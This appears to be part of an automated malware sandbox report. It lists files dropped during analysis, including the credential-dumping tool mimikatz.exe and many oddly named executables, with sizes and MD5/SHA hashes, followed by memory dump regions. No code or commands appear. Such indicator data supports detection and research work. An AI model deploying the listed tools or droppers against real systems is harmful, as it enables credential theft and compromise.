b474b021d0e8b405ea64bda4afef1c191834236c759a5e52fb8813fdfca14536942c9600624cfd1d675fd9e119579795c86dddabbf909eea21a585236b2489c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Stewart

Filesize
872KB

MD5
121c1acb3a03bd31c6ae1e13db4469c8

SHA1
e1d7be7f98ad139a0a0db4ef4014af420915ff2e

SHA256
1ecdd3d64dc38399a17c68412ecba9b9c1a31b9911605f22a362b4f0a1c7f21d

SHA512
898740bb7499b5d889c6b81b780cf76ace4ded1c50e26c6b9149fc9143724789328a937d0d6496e5838af5964813ff4d9edb0f8f696d8054ff5e03613f351583

Download Submit
C:\Users\Admin\AppData\Local\Temp\While

Filesize
71KB

MD5
8d0730549c077df4608642def3a3797b

SHA1
70ff0d8c5a80918766cee21a944ffcf1a589c35a

SHA256
34c4628b7b7f34ba02bf64d730eb7e957f943dc404f2f36a543b8d406b78775c

SHA512
ddb2ebebc032ace041df5ff83e2a4b68086ec4f89bd8a30f36cfe6fb7909ac895c00730c47a267bf5ba31ecf5863e4108c869a9d18dab538f4c18a5ee3a3d20f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gkpjh5rn.5so.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Desktop\4363463463464363463463463.exe

Filesize
10KB

MD5
2a94f3960c58c6e70826495f76d00b85

SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a

SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f

Download Submit
C:\Users\Admin\Desktop\Files\02.08.2022.exe

Filesize
242KB

MD5
589ddae338c2a7df328d6630f513475e

SHA1
e96c1f60875f6f315b09dae37ab1e8cf8add3993

SHA256
269519b5a1fb395ca164330671f78528efca1ac12ba08ab6e2d833bbe968ced9

SHA512
9fd4d418ac78a88323d68d95277fa391e4167ee99d8bd2a1f95aaa4c12594ce05f305e247f09d1284eefbfeb739ed7ef17c65014932660723f18e0c0e01c98be

Download Submit
C:\Users\Admin\Desktop\Files\PURLOG.exe

Filesize
1.8MB

MD5
457c9342db5fc82febdcf8a348123a0e

SHA1
e887c2a3159d59528550c775f9779c960e561f0d

SHA256
c4343749a452155318b249b122c8482e953994e31627cbc82a3c3e52c21ef902

SHA512
128c63e21e9998db3bc39411a5a0a83bca49fe2c86e45fd17a99d8d2f2cd84b926599b2472d7533931e021bbf3d44d0581e0b091870eb2c0dd895098bd229b6a

Download Submit
C:\Users\Admin\Desktop\Files\PctOccurred.exe

Filesize
1.3MB

MD5
31f04226973fdade2e7232918f11e5da

SHA1
ff19422e7095cb81c10f6e067d483429e25937df

SHA256
007c6dfe4466894d678c06e6b30df77225450225ddd8e904e731cab32e82c512

SHA512
42198fc375993a09da3c8a2766ee6831cf52ff8cd60b3eb4256a361afa6963f64a0aff49adb87c3b22950e03c8ef58a94655959771f8d2d5b754012706220f66

Download Submit
C:\Users\Admin\Desktop\Files\build11.exe

Filesize
10.7MB

MD5
2cb47309bb7dde63256835d5c872b2f9

SHA1
8baa9effc09cf80b4a1bac1aa2aa92b38c812f1d

SHA256
18687a2ceebf3eda4a11a2ef0b1d85360d8837ad05c1b57f9f749ea06578848e

SHA512
3db4a42cbf6bc26d77320bf747e7244e54320b5e6ebf6a65bfd731beb7e99958bc5b7e9fe3ab1579becd42c588789c2185be74f143d120041b0331b316017104

Download Submit
C:\Users\Admin\Desktop\Files\built.exe

Filesize
3.1MB

MD5
a813f565b05ee9df7e5db8dbbcc0fa43

SHA1
f508e738705163233b29ba54f4cb5ec4583d8df1

SHA256
ba59fb813ff718db8a17c4e5d244793d2199383969843ad31d09727b5e5ff156

SHA512
adb431c372c2e1d0f6019bedefe16a2253fcf76929ba7e2b9f9cc7a253137920615121a1a64f7003a43f39e8b17ace233daca32b2933b6953aa6cf558b834e2e

Download Submit
C:\Users\Admin\Desktop\Files\ewrvuh.exe

Filesize
2.8MB

MD5
bda1e244f73c16499b8faa763e79cc52

SHA1
f6b599b144c1a792681624cbbaf277352f175d55

SHA256
c1de42382bc44f0871f0fe67c18d669a57291deace62b9c27f7ad76872231886

SHA512
e8291e34976516e9a04eddfd82fbfd5eac1cbb8887b83e6cfb5c764992079d4139f9ef6aa3ae8fd3716aa6e221d1aa352f1472c7579636b5634071940066fd10

Download Submit
C:\Users\Admin\Desktop\Files\m.exe

Filesize
79KB

MD5
0c883b1d66afce606d9830f48d69d74b

SHA1
fe431fe73a4749722496f19b3b3ca0b629b50131

SHA256
d921fc993574c8be76553bcf4296d2851e48ee39b958205e69bdfd7cf661d2b1

SHA512
c047452a23efad4262479fbfeb5e23f9497d7cefd4cbb58e869801206669c2a0759698c70d18050316798d5d939b989537fdce3842aa742449f5e08ed7fa60a5

Download Submit
C:\Users\Admin\Desktop\Files\mimikatz.exe

Filesize
1.0MB

MD5
d3b17ddf0b98fd2441ed46b033043456

SHA1
93ed68c7e5096d936115854954135d110648e739

SHA256
94795fd89366e01bd6ce6471ff27c3782e2e16377a848426cf0b2e6baee9449b

SHA512
cac2230361981323ea998c08f7d9afc9369c62a683a60421628adab1eb1e4ffbbc9c2239a8bf66cb662ad7d56e7284f9051bb548979b8c6862570ce45aa27120

Download Submit
C:\Users\Admin\Desktop\Files\pei.exe

Filesize
10KB

MD5
08dafe3bb2654c06ead4bb33fb793df8

SHA1
d1d93023f1085eed136c6d225d998abf2d5a5bf0

SHA256
fc16c0bf09002c93723b8ab13595db5845a50a1b6a133237ac2d148b0bb41700

SHA512
9cf2bd749a9ee6e093979bc0d3aacfba03ad6469c98ff3ef35ce5d1635a052e4068ac50431626f6ba8649361802f7fb2ffffb2b325e2795c54b7014180559c99

Download Submit
C:\Users\Admin\Desktop\Files\pyl64.exe

Filesize
2.5MB

MD5
d07b3c00866cb1bba2cf2007161f84af

SHA1
f0215fdb9c97bd752489dd1601a4253494beafcb

SHA256
d2662051702168049d751c1b90cfef9f1e34a04a6c7689db3c79a2547a7339ba

SHA512
1d98b1d01e897caf715f877672cf256a25a3c3318af898df046cc011830376f558a65c0f5e308d0922f66634f24cced3999a7bb6cbffa9d8cd3091f27436f76f

Download Submit
C:\Users\Admin\Desktop\Files\test16.exe

Filesize
354KB

MD5
9f88e470f85b5916800c763a876b53f2

SHA1
4559253e6df6a68a29eedd91751ce288e846ebc8

SHA256
0961766103f8747172f795b6cbf3c8ef06a1ded91fe49ff0f2f280cc326d1d9a

SHA512
c4fc712ed346c3c40f33f2514f556e92d915a6d0257fdd8d174b3f87f8c34a9167cfaca58785b52b68a5e5c710656a6269e5d0e20eef7f63a6d06f658d53fb5d

Download Submit
C:\Users\Admin\Desktop\Files\up.exe

Filesize
11.4MB

MD5
f3d2b3aa8ea4df12b56486c60e146adc

SHA1
05d6e48bed2829c60575b4b3af010c88296c45ef

SHA256
9ba3f1cfdc0f97fad2bbbb59e197e9d0556b70501654f542b47ff05978b5b12d

SHA512
0674d8f646242a34bdcc71c239c0c9e94904138c199e1d9390819f60a80765ec2c836989f6bdbeaa22fb1bf04c850d26703be3248d4abaf0b294cd13322de031

Download Submit
C:\Users\Admin\Desktop\Files\win.exe

Filesize
5.1MB

MD5
73e0321f95791e8e56b6ae34dd83a198

SHA1
b1e794bb80680aa020f9d4769962c7b6b18cf22b

SHA256
cae686852a33b1f53cdb4a8e69323a1da42b5b8ac3dd119780959a981305466b

SHA512
cc7b0ddf8fdb779c64b4f9f8886be203efb639c5cad12e66434e98f7f8ac675aee1c893014d8c2a36761504b8b20b038a71413934b8bc8229fdde4f13c8d47bc

Download Submit
C:\Users\Admin\tbtnds.dat

Filesize
4KB

MD5
3d63858dea8b408bfef78924872819f7

SHA1
7647994c8f5704ba0c2ea886b31041a96a9226fb

SHA256
55d2d0216a308825cadc5a9dd8caf2d6512b5b990ba69f6c7c9e8812190a3894

SHA512
df32dd8d969cee3e4e2241fff620e3266da43ce7abbf93da56a20f30cd5efe3e9f2d1fe190fd7eab46e587a7861350deb1aaddca50d51d1b9894fd830dd251f9

Download Submit
memory/1420-4149-0x0000000000230000-0x0000000000554000-memory.dmp

Filesize
3.1MB

Download
memory/2776-1138-0x0000000031720000-0x00000000324CA000-memory.dmp

Filesize
13.7MB

Download
memory/2776-1155-0x0000000031720000-0x00000000324CA000-memory.dmp

Filesize
13.7MB

Download
memory/2860-4161-0x000000001B090000-0x000000001B0E0000-memory.dmp

Filesize
320KB

Download
memory/2860-4162-0x000000001BA30000-0x000000001BAE2000-memory.dmp

Filesize
712KB

Download
memory/3004-2006-0x0000022376820000-0x0000022376842000-memory.dmp

Filesize
136KB

Download
memory/3116-1147-0x0000000000E00000-0x0000000000E06000-memory.dmp

Filesize
24KB

Download
memory/3736-4040-0x000001BACFD10000-0x000001BACFDAE000-memory.dmp

Filesize
632KB

Download
memory/3736-1175-0x000001BAE8480000-0x000001BAE858E000-memory.dmp

Filesize
1.1MB

Download
memory/4444-96-0x000002CEA7080000-0x000002CEA722A000-memory.dmp

Filesize
1.7MB

Download
memory/4444-100-0x000002CEA7080000-0x000002CEA722A000-memory.dmp

Filesize
1.7MB

Download
memory/4444-1125-0x000002CE8E6D0000-0x000002CE8E71C000-memory.dmp

Filesize
304KB

Download
memory/4444-1171-0x000002CE8E720000-0x000002CE8E774000-memory.dmp

Filesize
336KB

Download
memory/4444-1124-0x000002CEA7330000-0x000002CEA745A000-memory.dmp

Filesize
1.2MB

Download
memory/4444-27-0x000002CE8C820000-0x000002CE8C9EA000-memory.dmp

Filesize
1.8MB

Download
memory/4444-62-0x000002CEA7080000-0x000002CEA722A000-memory.dmp

Filesize
1.7MB

Download
memory/4444-76-0x000002CEA7080000-0x000002CEA722A000-memory.dmp

Filesize
1.7MB

Download
memory/4444-60-0x000002CEA7080000-0x000002CEA722A000-memory.dmp

Filesize
1.7MB

Download
memory/4444-87-0x000002CEA7080000-0x000002CEA722A000-memory.dmp

Filesize
1.7MB

Download
memory/4444-64-0x000002CEA7080000-0x000002CEA722A000-memory.dmp

Filesize
1.7MB

Download
memory/4444-66-0x000002CEA7080000-0x000002CEA722A000-memory.dmp

Filesize
1.7MB

Download
memory/4444-70-0x000002CEA7080000-0x000002CEA722A000-memory.dmp

Filesize
1.7MB

Download
memory/4444-74-0x000002CEA7080000-0x000002CEA722A000-memory.dmp

Filesize
1.7MB

Download
memory/4444-78-0x000002CEA7080000-0x000002CEA722A000-memory.dmp

Filesize
1.7MB

Download
memory/4444-80-0x000002CEA7080000-0x000002CEA722A000-memory.dmp

Filesize
1.7MB

Download
memory/4444-82-0x000002CEA7080000-0x000002CEA722A000-memory.dmp

Filesize
1.7MB

Download
memory/4444-84-0x000002CEA7080000-0x000002CEA722A000-memory.dmp

Filesize
1.7MB

Download
memory/4444-88-0x000002CEA7080000-0x000002CEA722A000-memory.dmp

Filesize
1.7MB

Download
memory/4444-90-0x000002CEA7080000-0x000002CEA722A000-memory.dmp

Filesize
1.7MB

Download
memory/4444-92-0x000002CEA7080000-0x000002CEA722A000-memory.dmp

Filesize
1.7MB

Download
memory/4444-94-0x000002CEA7080000-0x000002CEA722A000-memory.dmp

Filesize
1.7MB

Download
memory/4444-99-0x000002CEA7080000-0x000002CEA722A000-memory.dmp

Filesize
1.7MB

Download
memory/4444-28-0x000002CEA7080000-0x000002CEA7230000-memory.dmp

Filesize
1.7MB

Download
memory/4444-102-0x000002CEA7080000-0x000002CEA722A000-memory.dmp

Filesize
1.7MB

Download
memory/4444-72-0x000002CEA7080000-0x000002CEA722A000-memory.dmp

Filesize
1.7MB

Download
memory/4444-68-0x000002CEA7080000-0x000002CEA722A000-memory.dmp

Filesize
1.7MB

Download
memory/4444-29-0x000002CEA7080000-0x000002CEA722A000-memory.dmp

Filesize
1.7MB

Download
memory/4444-30-0x000002CEA7080000-0x000002CEA722A000-memory.dmp

Filesize
1.7MB

Download
memory/4444-44-0x000002CEA7080000-0x000002CEA722A000-memory.dmp

Filesize
1.7MB

Download
memory/4444-32-0x000002CEA7080000-0x000002CEA722A000-memory.dmp

Filesize
1.7MB

Download
memory/4444-50-0x000002CEA7080000-0x000002CEA722A000-memory.dmp

Filesize
1.7MB

Download
memory/4444-35-0x000002CEA7080000-0x000002CEA722A000-memory.dmp

Filesize
1.7MB

Download
memory/4444-38-0x000002CEA7080000-0x000002CEA722A000-memory.dmp

Filesize
1.7MB

Download
memory/4444-40-0x000002CEA7080000-0x000002CEA722A000-memory.dmp

Filesize
1.7MB

Download
memory/4444-42-0x000002CEA7080000-0x000002CEA722A000-memory.dmp

Filesize
1.7MB

Download
memory/4444-46-0x000002CEA7080000-0x000002CEA722A000-memory.dmp

Filesize
1.7MB

Download
memory/4444-48-0x000002CEA7080000-0x000002CEA722A000-memory.dmp

Filesize
1.7MB

Download
memory/4444-37-0x000002CEA7080000-0x000002CEA722A000-memory.dmp

Filesize
1.7MB

Download
memory/5012-1129-0x0000000075240000-0x00000000759F1000-memory.dmp

Filesize
7.7MB

Download
memory/5012-1123-0x000000007524E000-0x000000007524F000-memory.dmp

Filesize
4KB

Download
memory/5012-7-0x0000000075240000-0x00000000759F1000-memory.dmp

Filesize
7.7MB

Download
memory/5012-6-0x0000000004DF0000-0x0000000004E8C000-memory.dmp

Filesize
624KB

Download
memory/5012-5-0x00000000003A0000-0x00000000003A8000-memory.dmp

Filesize
32KB

Download
memory/5012-4-0x000000007524E000-0x000000007524F000-memory.dmp

Filesize
4KB

Download